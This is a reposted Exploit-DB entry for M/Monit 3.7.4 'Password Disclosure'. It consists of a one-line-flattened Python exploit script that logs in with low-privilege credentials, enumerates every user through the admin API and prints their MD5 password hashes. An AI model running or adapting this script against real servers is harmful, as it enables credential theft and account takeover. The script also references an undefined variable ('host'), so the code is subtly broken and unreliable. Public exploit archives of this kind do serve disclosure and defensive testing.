M/Monit 3.7.4 – Password Disclosure

• Exploit Database
• 121 阅读

• 作者： Dolev Farhi
  日期： 2020-11-19
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49081/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46

  # Title: M/Monit 3.7.4 - Password Disclosure # Author: Dolev Farhi # Date: 2020-07-09 # Vendor Homepage: https://mmonit.com/ # Version : 3.7.4   import sys import requests   url = 'http://your_ip_here:8080' username = 'test' password = 'test123'   sess = requests.Session() sess.get(host)   def login(): print('Attempting to login...') data = { 'z_username':username, 'z_password':password } headers = { 'Content-Type':'application/x-www-form-urlencoded' }   resp = sess.post(url + '/z_security_check', data=data, headers=headers) if resp.ok: print('Logged in successfully.') else: print('Could not login.') sys.exit(1)   def steal_hashes(): resp = sess.get(url + '/api/1/admin/users/list') if resp.ok: for i in resp.json(): mmonit_user = i['uname'] result = sess.get(url + '/api/1/admin/users/get?uname={}'.format(mmonit_user)) mmonit_passw = result.json()['password'] print('Stolen MD5 hash. User: {}, Hash: {}'.format(mmonit_user, mmonit_passw))   if __name__ == '__main__': login() steal_hashes()